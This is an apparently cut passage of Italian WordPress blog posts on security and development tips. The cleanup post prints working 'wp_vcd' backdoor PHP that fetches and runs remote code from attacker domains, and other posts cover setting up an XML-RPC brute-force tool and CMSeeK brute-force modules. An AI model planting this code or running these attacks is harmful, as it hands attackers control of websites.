'url':'Official URL of the CMS',
'vd':'Version Detection (0 for no, 1 for yes)',
'deeps':'Deep Scan (0 for no 1 for yes)'
}

Risultato scansione:
tutti i risultati della scansione sono memorizzati in un file JSON denominatocms.json, è possibile trovare i registri all'interno dellaResult\<Target Site>directory e, dal momento che i risultati bruteforce sono memorizzati in un file txt sotto la directory dei risultati del sito.

Ecco un esempio del registro dei rapporti di JSON:

 

Moduli Bruteforce:
CMSeek ha un sistema modulare bruteforce che significa che puoi aggiungere i tuoi moduli bruteforce personalizzati per lavorare con cmseek. Una documentazione adeguata per la creazione di moduli verrà creata a breve, ma nel caso in cui tu abbia già capito come (abbastanza facile una volta analizzati i moduli pre-fatti) tutto ciò che devi fare è questo:
Aggiungi un commento esattamente come questo . Ciò aiuterà CMSeeK a conoscere il nome del CMS usando regex# <Name Of The CMS> Bruteforce module
Aggiungi un altro commento ### cmseekbruteforcemodule, questo aiuterà CMSeeK a sapere che è un modulo
Copia e incolla il modulo nella brutecmsdirectory sotto la directory di CMSeeK
Apri CMSeeK e ricostruisci cache usando Rcome input nel primo menu.
Se tutto è fatto bene vedrai qualcosa di simile a questo (fai riferimento allo screenshot qui sotto) e il tuo modulo sarà elencato nel menu bruteforce la prossima volta che aprirai CMSeeK.

Hai bisogno di più motivi per usare CMSeeK?
Se non puoi goderti sempre l'uscita dal CMSeeK (per favore non farlo) , ti saluterà in un messaggio di addio casuale in varie lingue.
Inoltre puoi provare a leggere i commenti nel codice che sono piuttosto casuali e bizzarri !!!

Screenshots:
Menu principale

Risultato della scansione

Risultato scansione WordPress

Linee guida per l'apertura di un problema:
assicurati di avere le seguenti informazioni allegate all'apertura di un nuovo problema:
Bersaglio
Copia esatta dell'errore o screenshot dell'errore
Il tuo sistema operativo e la versione di Python

Problemi senza queste informazioni potrebbero non avere risposta!

Dichiarazione di non responsabilità: l'utilizzo di K0SASP per testare o sfruttare siti Web senza una precedente coerenza reciproca può essere considerato un'attività illegale. È responsabilità dell'utente finale osservare tutte le leggi locali, statali e federali applicabili. Gli autori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo programma.

 

XML-RPC Wordpress

Premessa:
Dopo aver subito vari attacchi via XML-RPC con esito negativo (Grazie a WP aggiornato e a qualche accorgimento), voglio condividere con voi questo articolo.

XML-RPC  è una chiamata di procedura remota (RPC) che consente le  chiamate XML codificate che vengono trasportate tramite il protocollo HTTP.
Questo sistema semplifica l'inserimento di contenuti da remoto, rendendo semplice la pubblicazione di un grande volume di dati in una singola operazione tramite XML-RPC.

Questa particolarità e poi stata sfruttata dagli hacker nelle versioni di Wordpress antecedenti la 4.4.1 per effettuare un attacco brute force, 
che consiste nel provare una serie innumerevole di password per poter entrare nel sistema tramite  login.

Per contrastare questo tipo di attacco, oltre aggiornare il nostro Wordpress alla versione più recente rispetto la 4.4.1 in giu, utilizzare un utile plugin anche nella versione free - Ithemes un valido strumento semplice da usare è molto efficace.

Una delle sue caratteristiche che lo contraddistinguono sono la semplicità d'uso e sopratutto la sua forza nella sicurezza.
Una delle sue funzioni utili che ci eviteranno l'attacco brute force di password sarà limitare il numero di immissione di password nel login.
Una volta impostato tutti coloro che tenteranno di forzare il login con pass errate (a secondo della vostra impostazione) verranno bloccati e sarà registrato il loro IP Host che di seguito potremo bloccare definitivamente e monitorare.  Potremo anche fare in modo che il login avvenga solo da un IP cioè il nostro. Ci sono diversi sitemi per evitare questo tipo di attacco, questo è uno dei tanti.

Altro strumento ma apagamento e Bitninja server security

Protezione all-in-one
BitNinja combina il più potente software di sicurezza server in una suite di protezione facile da usare. Ottieni protezione completa contro XSS, DDoS, malware, scansioni, script injection, enumerazione, forza bruta e altri attacchi automatici - su tutti i principali protocolli, non solo su HTTP.

 

 

Ho avuto modo di testarlo, ottimo! (ma approfondiremo in seguito)

Strumento di test: Wordpress-XMLRPC-Brute-Force-Exploit

Questo software ci permettere di verificare il livello di rischio del nostro Sistema WP. tramite un brute force via XML-RPC
Link: https://github.com/1N3/Wordpress-XMLRPC-Brute-Force-Exploit
Install via termiale:

Apri una finestra di terminale e fai il cd ovunque tu abbia scaricato il file, quindi decomprimi i file in posizione:

decomprimere Wordpress-XMLRPC-Brute-Force-Exploit-master.zip

Quindi cambia in quella directory:

cd Wordpress-XMLRPC-Brute-Force-Exploit-master

Mentre sei lì, non ti farà male cambiare le autorizzazioni sul file Python per assicurarci di non incappare in alcun problema nell'esecuzione. Il "7" che stai assegnando significa che sarai in grado di fare tutto ciò che vuoi con il file.

chmod 755 wordpress-xmlrpc-brute.py

Ora esegui da solo il comando Python e dai un'occhiata alle istruzioni.

./wordpress-xmlrpc-brute.py

 

 

NB. in conclusione:

La protezione dalla vulnerabilità XML-RPC è semplice e le versioni più recenti non includono affatto la funzionalità. Detto questo, molti strumenti di pubblicazione di WordPress di terze parti come Jetpack e app per smartphone come IFTTT potrebbero richiedere l'uso di XML-RPC, quindi anche alcune installazioni di WordPress sono state aggiornate con il codice vulnerabile e sono quindi pronte all'intrusione.

Controlla le tue installazioni WordPress e assicurati che, se integri un nuovo strumento che consente l'interazione con WP da un punto di vista remoto, non hai aperto la porta all'intrusione di XML-RPC o di altre intrusioni.
Questa è una delle molte vulnerabilità di WordPress e questo semplice attacco di script è un buon punto di partenza per la tua ricerca.

Potremmo includere questo script all'interno del file function.php:

 

function Remove_Unneeded_XMLRPC( $methods ) {
 unset( $methods['wp.getUsersBlogs'] );
 return $methods;
}
add_filter( 'xmlrpc_methods', 'Remove_Unneeded_XMLRPC' );

Dichiarazione di non responsabilità: l'utilizzo di XMLRPC Brute Force Exploit per testare o sfruttare siti Web senza una precedente coerenza reciproca può essere considerato un'attività illegale. È responsabilità dell'utente finale osservare tutte le leggi locali, statali e federali applicabili. Gli autori non si assumono alcuna responsabilità e non sono responsabili per qualsiasi uso improprio o danno causato da questo programma.

"rogueads.unwanted_ads" su WP come rimuoverlo

La mia esperienza mi ha portato a scrivere questo post, per aiutarvi nella prevenzione ed eliminazione di fiale malevoli Malware che potrebbero compromettere il vostro WordPress, sia nel sistema che nel Posizionamento su Google e altri motori di ricerca.

Oggi ne andremo ad analizzare uno in particolare, molto comune in Wordpress “rogueads.unwanted_ads”

Descrizione: Iniezioni malevoli di Varios che comportano la visualizzazione di annunci (o l'apertura di finestre pop-up o pop-under) senza il consenso del proprietario del sito. Tali iniezioni possono utilizzare script di reti pubblicitarie legittime.

 

Molto facile a individuare appunto della sua presenza, visto che si apriranno pop up o link insueti al sito.
Molto importante e definire il flusso del contagio… in parole povere come ho preso il Malware?
Potrebbero essere molteplici le strade male più comuni sono:

1 Non importare plugin non legalmente acquistati
2 Non importare Template non legalmente acquistati
3 Aggiornare sempre il propio WP e i plugin associati
4 L’imitare l’uso dei plugin (onde evitare che se scritti male potrebbero essere facilmente compromessi)
5 Server sicuro quindi spendere il giusto non certo 1 euro

Ma adiamo al nocciolo del discorso, una volta che siamo in gioco cominceremo a verificare la vera identità tramite uno scanner online molto utile io uso questo: sitecheck.sucuri.net
Una volta individuato il problema… No Panico!

Spesso il Core del Malware va a intaccare il nostro file function.php del tema che stiamo utilizzando.
Ighettando uno script simile:

<?php
if ( isset( $_REQUEST[ 'action' ] ) && isset( $_REQUEST[ 'password' ] ) && ( $_REQUEST[ 'password' ] == '741b457737ff0478b6e1ccef383efcc9' ) ) {
 $div_code_name = "wp_vcd";
 switch ( $_REQUEST[ 'action' ] ) {
 case 'change_domain';
 if ( isset( $_REQUEST[ 'newdomain' ] ) ) {
 if ( !empty( $_REQUEST[ 'newdomain' ] ) ) {
 if ( $file = @file_get_contents( __FILE__ ) ) {
 if ( preg_match_all( '/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i', $file, $matcholddomain ) ) {
 $file = preg_replace( '/' . $matcholddomain[ 1 ][ 0 ] . '/i', $_REQUEST[ 'newdomain' ], $file );
 @file_put_contents( __FILE__, $file );
 print "true";
 }
 }
 }
 }
 break;
 case 'change_code';
 if ( isset( $_REQUEST[ 'newcode' ] ) ) {

 if ( !empty( $_REQUEST[ 'newcode' ] ) ) {
 if ( $file = @file_get_contents( __FILE__ ) ) {
 if ( preg_match_all( '/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i', $file, $matcholdcode ) ) {

 $file = str_replace( $matcholdcode[ 1 ][ 0 ], stripslashes( $_REQUEST[ 'newcode' ] ), $file );
 @file_put_contents( __FILE__, $file );
 print "true";
 }


 }
 }
 }
 break;

 default:
 print "ERROR_WP_ACTION WP_V_CD WP_CD";
 }

 die( "" );
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if ( !function_exists( 'theme_temp_setup' ) ) {
 $path = $_SERVER[ 'HTTP_HOST' ] . $_SERVER[ REQUEST_URI ];
 if ( stripos( $_SERVER[ 'REQUEST_URI' ], 'wp-cron.php' ) == false && stripos( $_SERVER[ 'REQUEST_URI' ], 'xmlrpc.php' ) == false ) {

 function file_get_contents_tcurl( $url ) {
 $ch = curl_init();
 curl_setopt( $ch, CURLOPT_AUTOREFERER, TRUE );
 curl_setopt( $ch, CURLOPT_HEADER, 0 );
 curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
 curl_setopt( $ch, CURLOPT_URL, $url );
 curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, TRUE );
 $data = curl_exec( $ch );
 curl_close( $ch );
 return $data;
 }

 function theme_temp_setup( $phpCode ) {
 $tmpfname = tempnam( sys_get_temp_dir(), "theme_temp_setup" );
 $handle = fopen( $tmpfname, "w+" );
 if ( fwrite( $handle, "<?php\n" . $phpCode ) ) {} else {
 $tmpfname = tempnam( './', "theme_temp_setup" );
 $handle = fopen( $tmpfname, "w+" );
 fwrite( $handle, "<?php\n" . $phpCode );
 }
 fclose( $handle );
 include $tmpfname;
 unlink( $tmpfname );
 return get_defined_vars();
 }


 $wp_auth_key = 'bb9aed696b080d6d327d927fc0b733d8';
 if ( ( $tmpcontent = @file_get_contents( "http://www.macocs.com/code.php" )OR $tmpcontent = @file_get_contents_tcurl( "http://www.macocs.com/code.php" ) )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {

 if ( stripos( $tmpcontent, $wp_auth_key ) !== false ) {
 extract( theme_temp_setup( $tmpcontent ) );
 @file_put_contents( ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent );

 if ( !file_exists( ABSPATH . 'wp-includes/wp-tmp.php' ) ) {
 @file_put_contents( get_template_directory() . '/wp-tmp.php', $tmpcontent );
 if ( !file_exists( get_template_directory() . '/wp-tmp.php' ) ) {
 @file_put_contents( 'wp-tmp.php', $tmpcontent );
 }
 }

 }
 } elseif ( $tmpcontent = @file_get_contents( "http://www.macocs.pw/code.php" )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {

 if ( stripos( $tmpcontent, $wp_auth_key ) !== false ) {
 extract( theme_temp_setup( $tmpcontent ) );
 @file_put_contents( ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent );

 if ( !file_exists( ABSPATH . 'wp-includes/wp-tmp.php' ) ) {
 @file_put_contents( get_template_directory() . '/wp-tmp.php', $tmpcontent );
 if ( !file_exists( get_template_directory() . '/wp-tmp.php' ) ) {
 @file_put_contents( 'wp-tmp.php', $tmpcontent );
 }
 }

 }
 }

 elseif ( $tmpcontent = @file_get_contents( "http://www.macocs.top/code.php" )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {

 if ( stripos( $tmpcontent, $wp_auth_key ) !== false ) {
 extract( theme_temp_setup( $tmpcontent ) );
 @file_put_contents( ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent );

 if ( !file_exists( ABSPATH . 'wp-includes/wp-tmp.php' ) ) {
 @file_put_contents( get_template_directory() . '/wp-tmp.php', $tmpcontent );
 if ( !file_exists( get_template_directory() . '/wp-tmp.php' ) ) {
 @file_put_contents( 'wp-tmp.php', $tmpcontent );
 }
 }

 }
 }
 elseif ( $tmpcontent = @file_get_contents( ABSPATH . 'wp-includes/wp-tmp.php' )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {
 extract( theme_temp_setup( $tmpcontent ) );

 } elseif ( $tmpcontent = @file_get_contents( get_template_directory() . '/wp-tmp.php' )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {
 extract( theme_temp_setup( $tmpcontent ) );

 } elseif ( $tmpcontent = @file_get_contents( 'wp-tmp.php' )AND stripos( $tmpcontent, $wp_auth_key ) !== false ) {
 extract( theme_temp_setup( $tmpcontent ) );

 }





 }
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?>

Se lo script è simile... possiamo procedere...

Come possiamo notare spesso andranno a richiamare altri file generati all’interno del core.
Leggendo il codice possiamo individuare il percorso del file da eliminare.

Spesso si trovano all’interno del core di WP nella cartella wp-includes/

Nel mio caso lo script in questione $div_code_name="wp_vcd"; all’interno del mio file function richimva un altro file all’interno della cartella wp-includes/wp-tmp.php

Quindi cosa fare?

Via FTP andremo nella cartella del mio tema,
e tolgieremo lo script malevolo all’interno del file function.php per poi eliminare il file wp-includes/wp-tmp.php.
Questa volta è stato facile, ma non si deve mai Abbassare la guardia!

Risorse:
sitecheck.sucuri.net
mxtoolbox.com

Wordpress Developer

Prima di tutto dobbiamo parlare del progetto Pluginize lanciato nel 2016 da WebDevStudios per promuovere, sostenere e ospitare tutti i prodotti WordPress.
Pluginize non è solo creazione di nuovi prodotti per WordPress, come CPTUI e CPTUI Extended, ma fornisce anche supporto continuativo e sviluppo per CMB2 e altro.

Plugin CPTUI ovvero 'Custom Post Type UI'

Questo plugin e un ottimo struento per poter implementare "Custom Post Types" all'interno del propio tema.
Ottimo per lo sviluppo, la versione free e fatta molto bene, semplice ed intuitiva.

Link ufficiale WordPress.org

Link ufficiale GitHub

Questo strumento ci permette di guadagnare tempo prezioso nello sviluppo, inoltre ci permette di non commettere errori sopratutto a sviluppatori alle prime armi.
Il plugi fornisce un'interfaccia facile da usare per la registrazione e la gestione di Custom Post Types e tassonomie per il tuo tema.
CPTUI da solo non gestisce gli aspetti relativi alla visualizzazione del tipo di post o del contenuto di tassonomia.
Il suo obiettivo è semplicemente la registrazione di entrambi.
Per entrare più sul dettaglio dovremo usare CPTUI-Extended che fornisce più strumenti per aiutare a visualizzare il contenuto di tutti i tipi registrati nel tuo tema ma è a pagamento

 

 

Tornando al CPTUI Free la sezione più interessante a mio dire è la possibilità di visualizzare il codice generato per poi implementarlo all'interno del file function.php

Per poi sviluppare e gestire il vostro template senza il plugin.
Ovvimante subito dopo si devono creare le sezioni di riferimento all'interno del vostro tema.
(esempio archive-nome.php, single-nome.php)

 

Maintenance Mode no plugin

Come aggiungere la funzionalità di Maintenance nel vostro WP ovvero sito in manutenzione.
Possiamo sia installare vari plugin, oppure inserire questa funzione all'interno del nostro file function.php:

/*************************

  // Activate WordPress Maintenance Mode

  function wp_maintenance_mode(){

  if(!current_user_can('edit_themes') || !is_user_logged_in()){

  wp_die('<h1 style="color:red">Website under Maintenance</h1><br />We are performing scheduled maintenance. We will be back online shortly!');

  }

  }

  add_action('get_header', 'wp_maintenance_mode');

//***************************

Grazie a RoBerto Briceño per lo script ;-)

Rinominare wp-login tramite file Function.php

Come modificare l'URL di login di WordPress wp-login.php senza l'uso di plugin ma sopratutto in modo sicuro (anche se non lo si è mai) Aggiungere un apposito filtro al file functions.php del vostro tema come esempio:

function example_simple_query_string_protection_for_login_page() {
$QS = '?nome-del-nuovo-login';//qui inserire la variabile per il link
$theRequest = 'https://' . $_SERVER['SERVER_NAME'] . '/' . 'wp-login.php' . '?'. $_SERVER['QUERY_STRING'];

if ( site_url('/wp-login.php').$QS == $theRequest ) {
echo 'URL Confermato';
} else {
header( 'Location: https://' . $_SERVER['SERVER_NAME'] . '/' );
}
}
add_action('login_head', 'example_simple_query_string_protection_for_login_page');

Il risultato sarà che per effettuare il login sul nostro Wordpress dovremmo digitare questo link:

https://www.nomesito.it/wp-login.php?nome-del-nuovo-login 

QTranslate-X implementazione in php (wp)

QTranslate-X è un plugin sviluppato per wordpress.
Vediamo come implemetare questo plugin all'interno del php di Wordpress nell'eventualità di non usare file po/mo.

Per poter interagire con qTranslate-x nelle sezioni ove non funziona la visuale nel pannello admin all'interno di Wordpress , si può usare questa sintassi [:it]testo italiano[:en]Testo in Inglese[:]

Ma se volessimo implemetare all'interno di una pagina o template creato a doc potremmo aver bisogno di interagire all'iterno del php stesso
Vedi esempio:

<?php echo __("[:it]Esempio [:en] Example[:]"); ?>

I migliori primi 3 Free Responsive WordPress Themes 2017

WordPress è indiscutibilmente la piattaforma CMS più preferito sul web.
A causa della popolarità e lo sviluppo del CMS WordPress, molto temi  sono gratuiti e di ottima fattura.

Sarà per la loro semplicità e facile utilizzo questo CMS si nutre di Themes (Temi)

La maggior parte di questi temi includono caratteristiche sorprendenti;  ecco l'elenco dei migliori temi WordPress gratuiti che è possibile utilizzare per il vostro prossimo progetto... ↓

 

 

 

Brilliance

Brilliance è un tema WordPress professionale, molto creativo, flessibile e propositivo, moderno e robusto.
Brilliance è una piattaforma luminosa e intuitiva per la creazione di siti web accattivanti, dinamici e altamente efficaci per lo più ad applicazioni professionali e di business, con capacità abbondante per il successo commerciale e professionale costruito a destra in questo potente tema. 

SCARICA IL TEMA

 

 

Allegiant

Le aziende amano il tema Allegiant, perché include  abbondanti risorse che sono ideali per accelerare lo sviluppo del propio sito web aziendale, come ad esempio una funzione integrata dell'inserimento "membro del team" e molto altro.
Elegante presentazione e completamente fuori del solito standard, adatto a lavori professionali.

SCARICA TEMA

 

 

Auberge

Auberge è un impressionante tema WordPress semplice ma molto di moda, merita almeno di vederlo.
Ha un 5 su 5 stelle, ed è stato scaricato più di 30000 volte. Questa popolarità dimostra la sua schiacciante qualità e l'utilità.

SCARICA TEMA

 

 

Content Locker ovvero ottenere share per il tuo Blog

Una delle attività molto importanti da non sottovalutate nel content marketing è il miglioramento dei contenuti e la l'oro originalità.
Chi scrive post interessanti e originali sa quanto lavoro sia necessario per pubblicare un nuovo articolo ed è quindi molto importante cercare di ottenere visibilità e trust, tra necessità e curiosità del lettore il Content Locker è un vero stumento prezioso!

Il content locker si può applicare al vostro sito sia inserendo il codice dello script sia utilizzando un plugin per Wordpress.
(Vi consiglio sempre per Wordpress di verificare la compatibilità della vostra versione WP e sopratutto se avete un sito in multi lingua)

Come potete vedere negli esempi potete effetture due strategie molto efficaci: Social Locker o Sign-In Locker

Social Locker Example

Sign-In Locker Example

Qui nella sezione Plugin Potete trovare quello che fa per voi ovvimante sia Pro che free! Mytheme

Quale CMS si dovrebbe utilizzare?

State considerando un nuovo sito web per la tua azienda nel 2017?
Chiedendosi quale piattaforma si dovrebbe usare per gestire i tuoi contenuti?

Analizza questa Infografica è scopri tutti i pro e contro dei CMS più diffusi, per pianificare la tua giusta strategia digitale o per semplicemente valutare quello più idoneo al tuo lavoro.

Fonte: makeawebsitehub.com

Grazie a red-website-design.co.uk

Sviluppare tema WordPress con 'underscores'

Per partire a sviluppare un tema Wordpress, si possono percorrere due strade.
La più complessa,  strutturare script dopo script tutto il template sulla base del 'core' di Wordpress.

Tempo di sviluppo e test, ma potremmo anche velocizzare il nostro lavoro partendo da una buona base.

Un ottimo strumento che genera un template minimale ma completo per partire a sviluppare è: tema underscores

Questo tema estremamente minimale è stato progettato appositamente per essere utilizzato come struttura base per la creazione di un nuovo tema,

Importante non deve essere usato come un  tema child wordpress ;-)

No ci resta che provare ;-)

 

Come eseguire la scansione del sito web Wordpress

Come il più popolare sistema di gestione dei contenuti on-line, siti web WordPress sono un obiettivo comune per gli hacker, spammer e altri soggetti malintenzionati.
Ecco perché è fondamentale adottare misure per rendere il vostro sito web più sicuro.
L'obiettivo della maggior parte degli hacker è quello di infettare il sito web con malware. minacce malware più comuni sono:

Pharma Hacks - inietta lo spam nel database sito web o file.

Backdoor - consente agli hacker di avere accesso al tuo sito web in qualsiasi momento, tramite FTP o la vostra area di amministrazione di WordPress.

Drive by Download - quando un hacker utilizza uno script per scaricare un file nel computer degli utenti, sia a loro insaputa o indurre in errore il visitatore e dicendo che il software fa qualcosa di utile.

Di file e database Iniezioni - codice inserisce nei file o database che consente gli hacker fanno un certo numero di cose diverse.

Redirect dannosi - Reindirizza i visitatori a una pagina di loro che induce in errore le persone a scaricare un file infetto.

Phishing - utilizzati per acquisire username, password, indirizzi e-mail e altre informazioni sensibili.

Quando la maggior parte della gente pensa su un sito web viene violato, pensano l'hacker deturpare il sito e mettendo un messaggio per i visitatori ad esempio il sito web è stato violato da gigio!

In realtà, defacement non sono così comuni.
La maggior parte degli hacker non voglio che tu sappia che hanno manomesso il tuo sito web, come la prima cosa che il proprietario di un sito web farà quando sanno che il loro sito è stato compromesso è rimuovere i file maligni in questione.

Gli hacker che infettano il tuo sito web con il malware sono più discreti. Più a lungo si sono a conoscenza del tuo sito web sia infetto, più a lungo possibile utilizzare il sito web per inviare e-mail di spam e infettare i visitatori. Anche un sito web WordPress sicuro può essere violato senza che il proprietario sapere. E 'quindi importante che eseguire la scansione del sito web regolarmente per rilevare eventuali malware nascosto.

In questo articolo, vorrei mostrarvi servizi e soluzioni di plugin che vi aiuteranno a rilevare il malware dannoso sul tuo sito web WordPress.

Sucuri Malware Scanning

Sucuri hanno una grande reputazione come un di sicurezza efficace e soluzione di scansione del malware. La loro Sucuri SiteCheck scanner esegue una scansione del sito web per i problemi più comuni gratuitamente.

Lo scanner esegue una scansione del sito web per le iniezioni di malware, defacement, e di spam. Sarà anche rilevare se il server sito è stato inserito nella lista nera (che può accadere se un hacker ha utilizzato il server per inviare spam). Il limite principale dello scanner è che è necessario eseguire la scansione del sito web manualmente da soli.

Aggiornamento a loro $ 89,99 piano di premio annuo vi darà avvisi automatici via e-mail e Twitter su eventuali problemi di malware. Questo piano sarà anche rimuovere il malware te e rimuoverò il tuo sito web da qualsiasi blacklist.

Sucuri offrono anche un plugin per WordPress intitolato Sucuri Security . Oltre alla scansione del sito web per il malware, il plugin offre un firewall per rendere il vostro sito più sicuro, le opzioni che affrontano buchi comuni di sicurezza di WordPress indurimento e una sezione "ultimi accessi" che mette in evidenza esattamente chi ha accesso al tuo sito web.

Il plugin ha anche alcune caratteristiche utili per il ripristino del sito web dopo un attacco, come ad esempio l'aggiornamento delle chiavi di sale WordPress e la reimpostazione delle password degli utenti.

Woocommerce aggiungere campo Codice Fiscale o p.IVA

Aggiungere il campo Codice Fiscale su WooCommerce (o p.IVA) nella sezione del checkout è ormai obbligatorio.
Ma vediamo di inserire il campo senza l'uso di plugin aggiountivi come il noto WooCommerce Checkout Manager che si rivela molto utile ma hai me potrebbe appesantire il nostro WooCommerce.

 Cero un hook all'interno del file functions.php:

// Creo un hook
add_filter( 'woocommerce_checkout_fields' , 'custom_override_checkout_fields' );
function custom_override_checkout_fields( $fields ) {
// Aggiungo il campo codice fiscale e lo rendo obbligatorio
$fields['billing']['billing_codice_fiscale'] = array(
'label'     => __('Codice Fiscale o p.IVA', 'woocommerce'),
'placeholder'   => _x('Codice Fiscale o p.IVA', 'placeholder', 'woocommerce'),
'required'  => true,
'clear'     => true
);
return $fields;
}
// Mostro il nuovo campo codice fiscale nella pagina di checkout
function my_custom_checkout_field_display_admin_order_meta($order){
echo '<div><strong>'.__('Codice Fiscale o p.IVA').':</strong> ' . get_post_meta( $order->id, '_codice_fiscale', true ) . '</div >';
}

Sviluppare tema Wordpress con BootstrapWP

Navigando sul web ho trovato BootstrapWP!
Ovvero come implemetare Bootstrap all'interno di un tema Wordpress e non solo... come costruire da un HTML un tema Wordpress e molto altro...

Devo dire che il tutorial è fatto molto bene sia per che e  appena agli inizi dello sviluppo di WordPress o sviluppatori più skillati...

Questo servizio ci offre una serire di tutotial, non tutti gratuiti:

Ma sempre ottimo per chi vuole cominciare sviluppare con Wordpress.

Link: bootstrapwp.com

 

 

Codeanywhere editor e sviluppo con tutta la velocita del cloud

Codeanywhere potente Web editor e ambiente di sviluppo integrato,  ha tutte le caratteristiche di un desktop IDE, ma con caratteristiche aggiuntive che  solo un'applicazione cloud può dare!
Editor associato al sistema operativo Chrome OS nato appunto per lesigenza di sviliuppare in piena libertà ed ovunque...

 

CodeAnywhere utilizza un modello freemium, in cui gli utenti possono pagare $ 5 al mese o $ 50 all'anno per gli aggiornamenti come FTP illimitati, FTPS e SFTP. Nei prossimi mesi, Burazin e Jukic dicono che il team dovrà lavorare a nuove funzionalità offline e integrazioni con i servizi di terze parti come Github.

 

Sviluppo

Una delle cose molto interessanti e la possibilità di scegliere l'ambinate di sviluppo, dai CMS più utilizzati Wordpress, Magento, Drupal a linguaggi di programmazione PHP,Java, C++.. e molto altro come AngularJS.

Sulla sinistra possiamo vedere come gestire i nosrtri progretti con i relativi file.
L'interfaccia di lavoro è molto semolice e chiara degna di un potente editor! assomiglia molto a Sublime text

 Non ci resta che provarlo!
Lini:codeanywhere.com

 

 

Gestire iscrizione email su multi liste con wordpress e MailChimp

Con Wordpress si posso creare e gestire diverse funzionalità in modo semplice.

Non sempre si ha il tempo per gestire le richieste del cliente e valutarne la funzionalità, ma fortunatamente con l’aiuto del giusto plugin possiamo velocemente gestire e risolvere molte cose.

Se dobbiamo gestire iscrizioni email su diverse liste, un buon compromesso e il plugin che ci mette a disposizione MailChimp:

“Easy Forms for MailChimp”.

 

 

Molto semplice da usare, ovviamente funziona con il tuo account MailChimp e di seguito inserendo la tua API Key.(vedi sotto esemp.)

Questo plugin si integra molto bene all’interno dei widgets sopratutto se sviluppati da noi.
Non resta che provarlo ;-)

 

 

Configurare file nginx.conf per W3TC Browser Cache

Migrare da un web server Apache a un web server Nginx, potrebbe complicarci la vita?
Direi di no su molti aspetti... ora il nostro file .htaccess non ci serve più, pertanto andiamo a scrivere le nostre richieste all'interno del file nginx.conf .

Nel caso all'interno del nostro Wordpress avessimo caricato il plugin W3 Total Cache non ci resta che scrivere all'interno del nostro nginx.conf le seguenti istruzioni:

# BEGIN W3TC Browser Cache
gzip on;
gzip_types text/css text/x-component application/x-javascript application/javascript text/javascript text/x-js text/richtext image/svg+xml text/plain text/xsd text/xsl text/xml image/bmp application/java application/msword application/vnd.ms-fontobject application/x-msdownload image/x-icon application/json application/vnd.ms-access application/vnd.ms-project application/x-font-otf application/vnd.ms-opentype application/vnd.oasis.opendocument.database application/vnd.oasis.opendocument.chart application/vnd.oasis.opendocument.formula application/vnd.oasis.opendocument.graphics application/vnd.oasis.opendocument.spreadsheet application/vnd.oasis.opendocument.text audio/ogg application/pdf application/vnd.ms-powerpoint application/x-shockwave-flash image/tiff application/x-font-ttf audio/wav application/vnd.ms-write application/font-woff application/font-woff2 application/vnd.ms-excel;
# END W3TC Browser Cache

Come potete vedere abbiamo attivato la compressione gzip.

Alleggerire il proprio WP se non si usano nuove funzionalità emoji

Come disabilitare le emoticons (emoji) di WordPress?
Grazie agli sviluppatori di wp basta inserire questo codice all'interno del propio file functions.php:

// Disabilitare le emoji
   remove_action('wp_head', 'print_emoji_detection_script', 7);
   remove_action('wp_print_styles', 'print_emoji_styles');

Compressione gzip

Una importantissima funzionalità per il nostro sito è la velocita!
Sempre più utenti vogliono tutto e subito, massimo 3 secondi ad apertura poi siamo out!
Ma anche per Google e fonte di posizionamento, più abbiamo una sito web ben strutturato e più potremmo essere ben posizioanti.
(Certo non serve solo quello si deve fare anche molto altro in ottica SEO)

Esistono due funzioni che permettono la compressione gzip tramite .htaccess, noi prenderemo mod_deflate il più attuale.
Il metodo di compresione gzip mod_deflate è possibile solamente su server linux che utilizzano  Apache 2 e superiori.

Il seguente codice attiva la compressione gzip per i contenuti del vostro sito e va inserito all'interno del file htaccess facendo molta attenzione,
un errore potrebbe compromettere la visualizzazione corretta del sito.

# DEFLATE compressione
<IfModule mod_deflate.c>
# Compress HTML, CSS, JavaScript, Text, XML and fonts
AddOutputFilterByType DEFLATE application/javascript
AddOutputFilterByType DEFLATE application/rss+xml
AddOutputFilterByType DEFLATE application/vnd.ms-fontobject
AddOutputFilterByType DEFLATE application/x-font
AddOutputFilterByType DEFLATE application/x-font-opentype
AddOutputFilterByType DEFLATE application/x-font-otf
AddOutputFilterByType DEFLATE application/x-font-truetype
AddOutputFilterByType DEFLATE application/x-font-ttf
AddOutputFilterByType DEFLATE application/x-javascript
AddOutputFilterByType DEFLATE application/xhtml+xml
AddOutputFilterByType DEFLATE application/xml
AddOutputFilterByType DEFLATE font/opentype
AddOutputFilterByType DEFLATE font/otf
AddOutputFilterByType DEFLATE font/ttf
AddOutputFilterByType DEFLATE image/svg+xml
AddOutputFilterByType DEFLATE image/x-icon
AddOutputFilterByType DEFLATE text/css
AddOutputFilterByType DEFLATE text/html
AddOutputFilterByType DEFLATE text/javascript
AddOutputFilterByType DEFLATE text/plain
AddOutputFilterByType DEFLATE text/xml
# Remove browser bugs
BrowserMatch ^Mozilla/4 gzip-only-text/html
BrowserMatch ^Mozilla/4\.0[678] no-gzip
BrowserMatch \bMSIE !no-gzip !gzip-only-text/html
Header append Vary User-Agent
</IfModule >
# FINE DEFLATE

AddOutputFilterByType: indica su quale specifico contenuto e file vogliamo attivare la compressione gzip.

BrowserMatch: specifica le direttive per alcuni browser e/o versioni obsolete per i quali queste impostazioni non sono valide.

Una volta inserito non vi resata di testare il tutto ;-)

 

Salva

Parrot Security OS sicurezza Hacking made in Italy

L'artefice di questa distribuzione per la sicurezza Hacking è Lorenzo Faretra (Eclipsespark) tutta made in Italy
Parrot Security OS, detta più semplicemente sembra essere una delle distribuzioni più promettenti per il futuro prossimo, tutta da testare e da verificare di persona visto i numerosi  fedelissimi che si avvicinano a quasta distribuzione.
Basata Debian linux, offre un ambinete di lavoro intuitivo completo e funzionale.

Nel sito madre si possono scaricare le versioni compatibili:
